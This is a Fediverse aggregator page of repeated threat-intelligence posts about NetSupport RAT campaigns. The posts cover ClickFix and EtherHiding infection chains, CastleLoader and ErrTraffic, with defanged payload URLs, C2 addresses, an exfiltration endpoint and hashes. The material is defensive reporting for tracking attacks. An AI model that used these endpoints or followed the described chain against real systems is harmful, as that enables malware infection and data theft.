home.social

#netsupportrat — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #netsupportrat, aggregated by home.social.

fetched live
  1. Expanding the Castle: New Campaigns, New Tooling, and the NeedleStealer Connection

    Arctic Wolf Labs has been tracking multiple campaigns built around CastleLoader, a multi-stage shellcode loader that has evolved significantly. Three distinct campaigns were identified: Urutyka, Garrigin, and Noidret. The most significant development is the integration of NeedleStealer framework payloads, marking the first observed use of Rust and Golang tooling in this campaign cluster. NeedleStealer includes a Rust-based desktop cryptocurrency wallet spoofer targeting Ledger, Trezor, and Exodus wallets, and a Golang-based malicious browser extension installer. The campaigns utilize obfuscated PowerShell stagers, IronPython runtimes, and NodeJS-based shellcode injectors. Infrastructure analysis revealed consistent naming patterns, staged domains for future operations, and the use of fraudulently obtained code-signing certificates. The campaigns consistently deploy NetSupport RAT and CastleStealer alongside the new NeedleStealer payloads, suggesting an expansion toward high-value cryptocurrency targeting.

    Pulse ID: 6a682376fe6eac7ecb782129
    Pulse Link: otx.alienvault.com/pulse/6a682
    Pulse Author: AlienVault
    Created: 2026-07-28 03:35:18

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Edge #Golang #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #Python #RAT #Rust #ShellCode #bot #cryptocurrency #AlienVault

  2. Expanding the Castle: New Campaigns, New Tooling, and the NeedleStealer Connection

    Arctic Wolf Labs has been tracking multiple campaigns built around CastleLoader, a multi-stage shellcode loader that has evolved significantly. Three distinct campaigns were identified: Urutyka, Garrigin, and Noidret. The most significant development is the integration of NeedleStealer framework payloads, marking the first observed use of Rust and Golang tooling in this campaign cluster. NeedleStealer includes a Rust-based desktop cryptocurrency wallet spoofer targeting Ledger, Trezor, and Exodus wallets, and a Golang-based malicious browser extension installer. The campaigns utilize obfuscated PowerShell stagers, IronPython runtimes, and NodeJS-based shellcode injectors. Infrastructure analysis revealed consistent naming patterns, staged domains for future operations, and the use of fraudulently obtained code-signing certificates. The campaigns consistently deploy NetSupport RAT and CastleStealer alongside the new NeedleStealer payloads, suggesting an expansion toward high-value cryptocurrency targeting.

    Pulse ID: 6a682376fe6eac7ecb782129
    Pulse Link: otx.alienvault.com/pulse/6a682
    Pulse Author: AlienVault
    Created: 2026-07-28 03:35:18

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Edge #Golang #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #Python #RAT #Rust #ShellCode #bot #cryptocurrency #AlienVault

  3. Expanding the Castle: New Campaigns, New Tooling, and the NeedleStealer Connection

    Arctic Wolf Labs has been tracking multiple campaigns built around CastleLoader, a multi-stage shellcode loader that has evolved significantly. Three distinct campaigns were identified: Urutyka, Garrigin, and Noidret. The most significant development is the integration of NeedleStealer framework payloads, marking the first observed use of Rust and Golang tooling in this campaign cluster. NeedleStealer includes a Rust-based desktop cryptocurrency wallet spoofer targeting Ledger, Trezor, and Exodus wallets, and a Golang-based malicious browser extension installer. The campaigns utilize obfuscated PowerShell stagers, IronPython runtimes, and NodeJS-based shellcode injectors. Infrastructure analysis revealed consistent naming patterns, staged domains for future operations, and the use of fraudulently obtained code-signing certificates. The campaigns consistently deploy NetSupport RAT and CastleStealer alongside the new NeedleStealer payloads, suggesting an expansion toward high-value cryptocurrency targeting.

    Pulse ID: 6a682376fe6eac7ecb782129
    Pulse Link: otx.alienvault.com/pulse/6a682
    Pulse Author: AlienVault
    Created: 2026-07-28 03:35:18

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Edge #Golang #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #Python #RAT #Rust #ShellCode #bot #cryptocurrency #AlienVault

  4. Expanding the Castle: New Campaigns, New Tooling, and the NeedleStealer Connection

    Arctic Wolf Labs has been tracking multiple campaigns built around CastleLoader, a multi-stage shellcode loader that has evolved significantly. Three distinct campaigns were identified: Urutyka, Garrigin, and Noidret. The most significant development is the integration of NeedleStealer framework payloads, marking the first observed use of Rust and Golang tooling in this campaign cluster. NeedleStealer includes a Rust-based desktop cryptocurrency wallet spoofer targeting Ledger, Trezor, and Exodus wallets, and a Golang-based malicious browser extension installer. The campaigns utilize obfuscated PowerShell stagers, IronPython runtimes, and NodeJS-based shellcode injectors. Infrastructure analysis revealed consistent naming patterns, staged domains for future operations, and the use of fraudulently obtained code-signing certificates. The campaigns consistently deploy NetSupport RAT and CastleStealer alongside the new NeedleStealer payloads, suggesting an expansion toward high-value cryptocurrency targeting.

    Pulse ID: 6a682376fe6eac7ecb782129
    Pulse Link: otx.alienvault.com/pulse/6a682
    Pulse Author: AlienVault
    Created: 2026-07-28 03:35:18

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Edge #Golang #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #Python #RAT #Rust #ShellCode #bot #cryptocurrency #AlienVault

  5. Expanding the Castle: New Campaigns, New Tooling, and the NeedleStealer Connection

    Arctic Wolf Labs has been tracking multiple campaigns built around CastleLoader, a multi-stage shellcode loader that has evolved significantly. Three distinct campaigns were identified: Urutyka, Garrigin, and Noidret. The most significant development is the integration of NeedleStealer framework payloads, marking the first observed use of Rust and Golang tooling in this campaign cluster. NeedleStealer includes a Rust-based desktop cryptocurrency wallet spoofer targeting Ledger, Trezor, and Exodus wallets, and a Golang-based malicious browser extension installer. The campaigns utilize obfuscated PowerShell stagers, IronPython runtimes, and NodeJS-based shellcode injectors. Infrastructure analysis revealed consistent naming patterns, staged domains for future operations, and the use of fraudulently obtained code-signing certificates. The campaigns consistently deploy NetSupport RAT and CastleStealer alongside the new NeedleStealer payloads, suggesting an expansion toward high-value cryptocurrency targeting.

    Pulse ID: 6a682376fe6eac7ecb782129
    Pulse Link: otx.alienvault.com/pulse/6a682
    Pulse Author: AlienVault
    Created: 2026-07-28 03:35:18

    Be advised, this data is unverified and should be considered preliminary. Always do further verification.

    #Browser #CyberSecurity #Edge #Golang #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #PowerShell #Python #RAT #Rust #ShellCode #bot #cryptocurrency #AlienVault

  6. @CatherineFlick

    The website wavesandwild[.]com was compromised with the ClickFix social engineering technique to trick victims into executing malicious commands injected into their clipboard which installs and runs NetSupport RAT, a remote access tool. NetSupport RAT is based on NetSupport Manager, a legitimate tool which is frequently used by bad actors for malicious purposes. NetSupport Manager, used maliciously or otherwise, provides full and complete control over the victim’s device. Once the client has been installed, attackers can access, acquire, and manipulate any data on the device (exfiltrate data, execute additional payloads).

    The gory (and potentially boring) technical details are as follows. I wanted to share these details for folks like me who track and monitor ClickFix attacks. Do NOT visit or interact with any of the below content. Thanks for sharing this attack!

    ———————————

    Full Attack Chain:
    wavesandwild[.]com (compromised site)
    --> POST polygon.publicnode[.]com/polygon.drpc[.]org to perform transaction lookup for next domain: "to": "0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A", "data": "0xe00fe2eb" (aka 'EtherHiding')
    --> Download and process content on hxxps://sentrydb[.]org/track.php
    --> Load victim's clipboard, display ClickFix splash screen
    --> Victim copy and pastes malicious obfuscated command to their clipboard
    --> powershell downloads and executes feinmotorik.geschenkideen-die-foerdern[.]de/index.html
    --> Retrieves feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt
    --> Extracts and XOR-decrypts an embedded blob within the PNG file 'clik.txt'
    --> Installs and runs NetSupport RAT using embedded configuration files
    --> C2 communication established with 216.158.95[.]180:443, tamweelke[.]com:443, or bcrfix[.]com:443
    --> Host reconnaissance command results (OS, username, date, application name (SecurityHealth), computer name, IP details) sent to hxxp://172.245.25[.]134:8787/collect, likely for victim prioritization efforts

    IOCs
    wavesandwild[.]com - Compromised website (ClickFix)
    polygon.publicnode[.]com - RPC domain lookup
    polygon.drpc[.]org - Fallback RPC domain lookup
    0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A - wallet address containing the next stage
    hxxps://sentrydb[.]org/track.php - Domain retrieved via the RPC lookup which filters victims based on response and if passes checks, delivers the ClickFix command to be pasted into the victim's clipboard
    feinmotorik.geschenkideen-die-foerdern[.]de/index.html - URL in obfuscated ClickFix powershell command
    feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt - additional URL contacted containing the PNG file with the embedded, encrypted NetSupport RAT
    ip-api[.]com/json/?fields=query,country,city - IP address lookup for victim
    hxxp://172.245.25[.]134:8787/collect - Exfiltrated recon data destination stolen from victim's host
    216.158.95[.]180:443 - NetSupport RAT gateway address
    tamweelke[.]com:443 - NetSupport RAT gateway address
    bcrfix[.]com:443 - Secondary NetSupport RAT gateway address
    CH-124FF74C - index string, potential campaign ID?
    29b68bb454600b0abd1aad1f861bd11f28cd6cf9cd39cec53cc36
    275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792 - SecurityHealth.exe (NetSupport RAT)

    Interesting findings:
    The error messages in the final Powershell script block are in Russian.
    The embedded index string is CH-124FF74C (campaign identifier?).
    Each stage listed above was heavily obfuscated, making reverse engineering analysis extremely tedious and time-consuming.
    The malware attempts to remove all entries from the RunMRU registry key to hide the ClickFix execution evidence.
    Clik.txt is not actually a TXT file but rather a PNG file which contains an embedded malicious blob along with the XOR key to decrypt and run the NetSupport RAT.
    Sekoia calls this IClickFix - sekoia.com/blog/meet-iclickfix

    #clickfix #etherhiding #netsupportrat #netsupportmanager #malware #reverseengineering

  7. @CatherineFlick

    The website wavesandwild[.]com was compromised with the ClickFix social engineering technique to trick victims into executing malicious commands injected into their clipboard which installs and runs NetSupport RAT, a remote access tool. NetSupport RAT is based on NetSupport Manager, a legitimate tool which is frequently used by bad actors for malicious purposes. NetSupport Manager, used maliciously or otherwise, provides full and complete control over the victim’s device. Once the client has been installed, attackers can access, acquire, and manipulate any data on the device (exfiltrate data, execute additional payloads).

    The gory (and potentially boring) technical details are as follows. I wanted to share these details for folks like me who track and monitor ClickFix attacks. Do NOT visit or interact with any of the below content. Thanks for sharing this attack!

    ———————————

    Full Attack Chain:
    wavesandwild[.]com (compromised site)
    --> POST polygon.publicnode[.]com/polygon.drpc[.]org to perform transaction lookup for next domain: "to": "0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A", "data": "0xe00fe2eb" (aka 'EtherHiding')
    --> Download and process content on hxxps://sentrydb[.]org/track.php
    --> Load victim's clipboard, display ClickFix splash screen
    --> Victim copy and pastes malicious obfuscated command to their clipboard
    --> powershell downloads and executes feinmotorik.geschenkideen-die-foerdern[.]de/index.html
    --> Retrieves feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt
    --> Extracts and XOR-decrypts an embedded blob within the PNG file 'clik.txt'
    --> Installs and runs NetSupport RAT using embedded configuration files
    --> C2 communication established with 216.158.95[.]180:443, tamweelke[.]com:443, or bcrfix[.]com:443
    --> Host reconnaissance command results (OS, username, date, application name (SecurityHealth), computer name, IP details) sent to hxxp://172.245.25[.]134:8787/collect, likely for victim prioritization efforts

    IOCs
    wavesandwild[.]com - Compromised website (ClickFix)
    polygon.publicnode[.]com - RPC domain lookup
    polygon.drpc[.]org - Fallback RPC domain lookup
    0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A - wallet address containing the next stage
    hxxps://sentrydb[.]org/track.php - Domain retrieved via the RPC lookup which filters victims based on response and if passes checks, delivers the ClickFix command to be pasted into the victim's clipboard
    feinmotorik.geschenkideen-die-foerdern[.]de/index.html - URL in obfuscated ClickFix powershell command
    feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt - additional URL contacted containing the PNG file with the embedded, encrypted NetSupport RAT
    ip-api[.]com/json/?fields=query,country,city - IP address lookup for victim
    hxxp://172.245.25[.]134:8787/collect - Exfiltrated recon data destination stolen from victim's host
    216.158.95[.]180:443 - NetSupport RAT gateway address
    tamweelke[.]com:443 - NetSupport RAT gateway address
    bcrfix[.]com:443 - Secondary NetSupport RAT gateway address
    CH-124FF74C - index string, potential campaign ID?
    29b68bb454600b0abd1aad1f861bd11f28cd6cf9cd39cec53cc36
    275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792 - SecurityHealth.exe (NetSupport RAT)

    Interesting findings:
    The error messages in the final Powershell script block are in Russian.
    The embedded index string is CH-124FF74C (campaign identifier?).
    Each stage listed above was heavily obfuscated, making reverse engineering analysis extremely tedious and time-consuming.
    The malware attempts to remove all entries from the RunMRU registry key to hide the ClickFix execution evidence.
    Clik.txt is not actually a TXT file but rather a PNG file which contains an embedded malicious blob along with the XOR key to decrypt and run the NetSupport RAT.
    Sekoia calls this IClickFix - sekoia.com/blog/meet-iclickfix

    #clickfix #etherhiding #netsupportrat #netsupportmanager #malware #reverseengineering

  8. @CatherineFlick

    The website wavesandwild[.]com was compromised with the ClickFix social engineering technique to trick victims into executing malicious commands injected into their clipboard which installs and runs NetSupport RAT, a remote access tool. NetSupport RAT is based on NetSupport Manager, a legitimate tool which is frequently used by bad actors for malicious purposes. NetSupport Manager, used maliciously or otherwise, provides full and complete control over the victim’s device. Once the client has been installed, attackers can access, acquire, and manipulate any data on the device (exfiltrate data, execute additional payloads).

    The gory (and potentially boring) technical details are as follows. I wanted to share these details for folks like me who track and monitor ClickFix attacks. Do NOT visit or interact with any of the below content. Thanks for sharing this attack!

    ———————————

    Full Attack Chain:
    wavesandwild[.]com (compromised site)
    --> POST polygon.publicnode[.]com/polygon.drpc[.]org to perform transaction lookup for next domain: "to": "0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A", "data": "0xe00fe2eb" (aka 'EtherHiding')
    --> Download and process content on hxxps://sentrydb[.]org/track.php
    --> Load victim's clipboard, display ClickFix splash screen
    --> Victim copy and pastes malicious obfuscated command to their clipboard
    --> powershell downloads and executes feinmotorik.geschenkideen-die-foerdern[.]de/index.html
    --> Retrieves feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt
    --> Extracts and XOR-decrypts an embedded blob within the PNG file 'clik.txt'
    --> Installs and runs NetSupport RAT using embedded configuration files
    --> C2 communication established with 216.158.95[.]180:443, tamweelke[.]com:443, or bcrfix[.]com:443
    --> Host reconnaissance command results (OS, username, date, application name (SecurityHealth), computer name, IP details) sent to hxxp://172.245.25[.]134:8787/collect, likely for victim prioritization efforts

    IOCs
    wavesandwild[.]com - Compromised website (ClickFix)
    polygon.publicnode[.]com - RPC domain lookup
    polygon.drpc[.]org - Fallback RPC domain lookup
    0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A - wallet address containing the next stage
    hxxps://sentrydb[.]org/track.php - Domain retrieved via the RPC lookup which filters victims based on response and if passes checks, delivers the ClickFix command to be pasted into the victim's clipboard
    feinmotorik.geschenkideen-die-foerdern[.]de/index.html - URL in obfuscated ClickFix powershell command
    feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt - additional URL contacted containing the PNG file with the embedded, encrypted NetSupport RAT
    ip-api[.]com/json/?fields=query,country,city - IP address lookup for victim
    hxxp://172.245.25[.]134:8787/collect - Exfiltrated recon data destination stolen from victim's host
    216.158.95[.]180:443 - NetSupport RAT gateway address
    tamweelke[.]com:443 - NetSupport RAT gateway address
    bcrfix[.]com:443 - Secondary NetSupport RAT gateway address
    CH-124FF74C - index string, potential campaign ID?
    29b68bb454600b0abd1aad1f861bd11f28cd6cf9cd39cec53cc36
    275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792 - SecurityHealth.exe (NetSupport RAT)

    Interesting findings:
    The error messages in the final Powershell script block are in Russian.
    The embedded index string is CH-124FF74C (campaign identifier?).
    Each stage listed above was heavily obfuscated, making reverse engineering analysis extremely tedious and time-consuming.
    The malware attempts to remove all entries from the RunMRU registry key to hide the ClickFix execution evidence.
    Clik.txt is not actually a TXT file but rather a PNG file which contains an embedded malicious blob along with the XOR key to decrypt and run the NetSupport RAT.
    Sekoia calls this IClickFix - sekoia.com/blog/meet-iclickfix

    #clickfix #etherhiding #netsupportrat #netsupportmanager #malware #reverseengineering

  9. @CatherineFlick

    The website wavesandwild[.]com was compromised with the ClickFix social engineering technique to trick victims into executing malicious commands injected into their clipboard which installs and runs NetSupport RAT, a remote access tool. NetSupport RAT is based on NetSupport Manager, a legitimate tool which is frequently used by bad actors for malicious purposes. NetSupport Manager, used maliciously or otherwise, provides full and complete control over the victim’s device. Once the client has been installed, attackers can access, acquire, and manipulate any data on the device (exfiltrate data, execute additional payloads).

    The gory (and potentially boring) technical details are as follows. I wanted to share these details for folks like me who track and monitor ClickFix attacks. Do NOT visit or interact with any of the below content. Thanks for sharing this attack!

    ———————————

    Full Attack Chain:
    wavesandwild[.]com (compromised site)
    --> POST polygon.publicnode[.]com/polygon.drpc[.]org to perform transaction lookup for next domain: "to": "0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A", "data": "0xe00fe2eb" (aka 'EtherHiding')
    --> Download and process content on hxxps://sentrydb[.]org/track.php
    --> Load victim's clipboard, display ClickFix splash screen
    --> Victim copy and pastes malicious obfuscated command to their clipboard
    --> powershell downloads and executes feinmotorik.geschenkideen-die-foerdern[.]de/index.html
    --> Retrieves feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt
    --> Extracts and XOR-decrypts an embedded blob within the PNG file 'clik.txt'
    --> Installs and runs NetSupport RAT using embedded configuration files
    --> C2 communication established with 216.158.95[.]180:443, tamweelke[.]com:443, or bcrfix[.]com:443
    --> Host reconnaissance command results (OS, username, date, application name (SecurityHealth), computer name, IP details) sent to hxxp://172.245.25[.]134:8787/collect, likely for victim prioritization efforts

    IOCs
    wavesandwild[.]com - Compromised website (ClickFix)
    polygon.publicnode[.]com - RPC domain lookup
    polygon.drpc[.]org - Fallback RPC domain lookup
    0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A - wallet address containing the next stage
    hxxps://sentrydb[.]org/track.php - Domain retrieved via the RPC lookup which filters victims based on response and if passes checks, delivers the ClickFix command to be pasted into the victim's clipboard
    feinmotorik.geschenkideen-die-foerdern[.]de/index.html - URL in obfuscated ClickFix powershell command
    feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt - additional URL contacted containing the PNG file with the embedded, encrypted NetSupport RAT
    ip-api[.]com/json/?fields=query,country,city - IP address lookup for victim
    hxxp://172.245.25[.]134:8787/collect - Exfiltrated recon data destination stolen from victim's host
    216.158.95[.]180:443 - NetSupport RAT gateway address
    tamweelke[.]com:443 - NetSupport RAT gateway address
    bcrfix[.]com:443 - Secondary NetSupport RAT gateway address
    CH-124FF74C - index string, potential campaign ID?
    29b68bb454600b0abd1aad1f861bd11f28cd6cf9cd39cec53cc36
    275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792 - SecurityHealth.exe (NetSupport RAT)

    Interesting findings:
    The error messages in the final Powershell script block are in Russian.
    The embedded index string is CH-124FF74C (campaign identifier?).
    Each stage listed above was heavily obfuscated, making reverse engineering analysis extremely tedious and time-consuming.
    The malware attempts to remove all entries from the RunMRU registry key to hide the ClickFix execution evidence.
    Clik.txt is not actually a TXT file but rather a PNG file which contains an embedded malicious blob along with the XOR key to decrypt and run the NetSupport RAT.
    Sekoia calls this IClickFix - sekoia.com/blog/meet-iclickfix

    #clickfix #etherhiding #netsupportrat #netsupportmanager #malware #reverseengineering

  10. @CatherineFlick

    The website wavesandwild[.]com was compromised with the ClickFix social engineering technique to trick victims into executing malicious commands injected into their clipboard which installs and runs NetSupport RAT, a remote access tool. NetSupport RAT is based on NetSupport Manager, a legitimate tool which is frequently used by bad actors for malicious purposes. NetSupport Manager, used maliciously or otherwise, provides full and complete control over the victim’s device. Once the client has been installed, attackers can access, acquire, and manipulate any data on the device (exfiltrate data, execute additional payloads).

    The gory (and potentially boring) technical details are as follows. I wanted to share these details for folks like me who track and monitor ClickFix attacks. Do NOT visit or interact with any of the below content. Thanks for sharing this attack!

    ———————————

    Full Attack Chain:
    wavesandwild[.]com (compromised site)
    --> POST polygon.publicnode[.]com/polygon.drpc[.]org to perform transaction lookup for next domain: "to": "0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A", "data": "0xe00fe2eb" (aka 'EtherHiding')
    --> Download and process content on hxxps://sentrydb[.]org/track.php
    --> Load victim's clipboard, display ClickFix splash screen
    --> Victim copy and pastes malicious obfuscated command to their clipboard
    --> powershell downloads and executes feinmotorik.geschenkideen-die-foerdern[.]de/index.html
    --> Retrieves feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt
    --> Extracts and XOR-decrypts an embedded blob within the PNG file 'clik.txt'
    --> Installs and runs NetSupport RAT using embedded configuration files
    --> C2 communication established with 216.158.95[.]180:443, tamweelke[.]com:443, or bcrfix[.]com:443
    --> Host reconnaissance command results (OS, username, date, application name (SecurityHealth), computer name, IP details) sent to hxxp://172.245.25[.]134:8787/collect, likely for victim prioritization efforts

    IOCs
    wavesandwild[.]com - Compromised website (ClickFix)
    polygon.publicnode[.]com - RPC domain lookup
    polygon.drpc[.]org - Fallback RPC domain lookup
    0x6300d82A6e2fabbd165E1833d95E87bD46B38D4A - wallet address containing the next stage
    hxxps://sentrydb[.]org/track.php - Domain retrieved via the RPC lookup which filters victims based on response and if passes checks, delivers the ClickFix command to be pasted into the victim's clipboard
    feinmotorik.geschenkideen-die-foerdern[.]de/index.html - URL in obfuscated ClickFix powershell command
    feinmotorik.geschenkideen-die-foerdern[.]de/clik.txt - additional URL contacted containing the PNG file with the embedded, encrypted NetSupport RAT
    ip-api[.]com/json/?fields=query,country,city - IP address lookup for victim
    hxxp://172.245.25[.]134:8787/collect - Exfiltrated recon data destination stolen from victim's host
    216.158.95[.]180:443 - NetSupport RAT gateway address
    tamweelke[.]com:443 - NetSupport RAT gateway address
    bcrfix[.]com:443 - Secondary NetSupport RAT gateway address
    CH-124FF74C - index string, potential campaign ID?
    29b68bb454600b0abd1aad1f861bd11f28cd6cf9cd39cec53cc36
    275e5b085534f64313b50cbdcb08ecd59c57d21c96bb937f140ee92a3d27f792 - SecurityHealth.exe (NetSupport RAT)

    Interesting findings:
    The error messages in the final Powershell script block are in Russian.
    The embedded index string is CH-124FF74C (campaign identifier?).
    Each stage listed above was heavily obfuscated, making reverse engineering analysis extremely tedious and time-consuming.
    The malware attempts to remove all entries from the RunMRU registry key to hide the ClickFix execution evidence.
    Clik.txt is not actually a TXT file but rather a PNG file which contains an embedded malicious blob along with the XOR key to decrypt and run the NetSupport RAT.
    Sekoia calls this IClickFix - sekoia.com/blog/meet-iclickfix

    #clickfix #etherhiding #netsupportrat #netsupportmanager #malware #reverseengineering

  11. RE: infosec.exchange/@briankrebs/1

    Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
    ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
    PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
    PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
    NetSupport C2 178[.]16[.]55[.]191.

    TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

    Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

  12. RE: infosec.exchange/@briankrebs/1

    Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
    ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
    PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
    PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
    NetSupport C2 178[.]16[.]55[.]191.

    TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

    Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

  13. RE: infosec.exchange/@briankrebs/1

    Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
    ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
    PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
    PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
    NetSupport C2 178[.]16[.]55[.]191.

    TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

    Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

  14. RE: infosec.exchange/@briankrebs/1

    Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
    ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
    PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
    PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
    NetSupport C2 178[.]16[.]55[.]191.

    TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

    Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

  15. RE: infosec.exchange/@briankrebs/1

    Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
    ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
    PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
    PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
    NetSupport C2 178[.]16[.]55[.]191.

    TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

    Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

  16. 2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

    Details at www.malware-traffic-analysis.net/2025/12/29/index.html

    Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

    The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

  17. 2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

    Details at www.malware-traffic-analysis.net/2025/12/29/index.html

    Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

    The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

  18. 2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

    Details at www.malware-traffic-analysis.net/2025/12/29/index.html

    Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

    The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

  19. 2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

    Details at www.malware-traffic-analysis.net/2025/12/29/index.html

    Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

    The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

  20. 2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

    Details at www.malware-traffic-analysis.net/2025/12/29/index.html

    Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

    The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

  21. New JS#SMUGGLER malware campaign delivers through compromised websites – hackers get full remote control of Windows machines.

    Read: hackread.com/jssmuggler-netsup

  22. Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

    The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

    Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
    Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

    Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

    💬 Share your perspective
    👍 Follow us for more clear, unbiased threat reporting

    #Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

  23. Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

    The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

    Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
    Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

    Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

    💬 Share your perspective
    👍 Follow us for more clear, unbiased threat reporting

    #Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

  24. Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

    The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

    Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
